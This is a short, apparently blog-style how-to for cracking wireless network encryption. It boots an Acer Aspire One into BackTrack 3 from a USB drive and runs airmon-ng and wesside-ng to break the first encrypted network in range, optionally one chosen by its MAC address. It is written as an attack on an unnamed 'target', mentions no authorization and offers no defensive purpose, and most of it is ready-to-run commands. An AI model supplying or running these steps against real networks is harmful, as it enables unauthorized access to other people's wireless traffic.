AA1 WiFi Cracking Quick Instructions
You need:
- Acer Aspire One (AA1)
- 1GB or larger USB thumb drive
- A target
Setup:
- Download BackTrack 3 (torrent here)
- Extract the ISO with your favorite application (I prefer IZArc)
- Copy BT3 and BOOT folders to the thumb drive
- Start a command prompt and enter the following commands, where X is the letter of your thumb drive (NOTE: when you run bootinst, make sure it specifies the correct drive letter):
  - X:
  - cd boot
  - bootinst
The Assault:
- Restart the AA1
- When the initial BIOS screen starts, press F12 a couple of times
- Select your thumb drive from the list
- On the first menu, choose the fourth option
- Press the space bar when it gripes about not having the right video settings
- Wait for the login prompt.
- Log in with the username root and a password of toor
- Type the following commands to break the first encrypted connection it comes across:
  - airmon-ng stop ath0
  - airmon-ng start wifi0
  - wesside-ng -i ath0
That’s pretty much it. You sit and wait for it to find a connection, sniff the data and bust it wide open. I’ve seen this take as little as 1.5 minutes all the way up to 4-5 hours; it all depends on the traffic on the network.
For a more precise attack, you can specify an access point by its MAC address by adding -v 00:00:00:00:00:00 to the last command, replacing 00:00:00:00:00:00 with the actual MAC address, so it looks something like this:
wesside-ng -v 12:34:56:78:90:ab -i ath0
To find the MAC address of an access point, use something like NetStumbler for Windows XP or inSSIDer for Vista/Windows 7.